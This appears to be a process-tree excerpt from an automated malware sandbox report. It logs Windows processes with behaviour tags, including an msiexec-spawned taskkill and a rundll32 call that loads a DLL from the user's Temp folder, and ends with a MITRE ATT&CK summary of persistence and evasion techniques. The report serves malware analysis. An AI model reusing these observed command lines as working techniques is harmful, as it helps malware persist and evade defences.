C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7420
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1076
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4784
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5592
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵PID:3140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:5296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7072
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:496
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4924
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:8632
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:3520
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3240
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5696
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1168
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7000
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8780
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:7352
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6584
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5724
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:7972
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5444
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9164
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2548
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5792
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:2492
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4260
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2244
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7544
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:2036
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2272 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 12854B89113AB425041468445F4B722A C2⤵PID:7688
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32834F0842D4ACB6674D642FAD4FC5632⤵PID:4868
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:8908
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 16E225FB0E95FD68458D8CD2C5EB5F00 E Global\MSI00002⤵PID:8976
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8296 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3944
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5404
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:7648
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
3Install Root Certificate
1Modify Registry
8Virtualization/Sandbox Evasion
1Web Service
1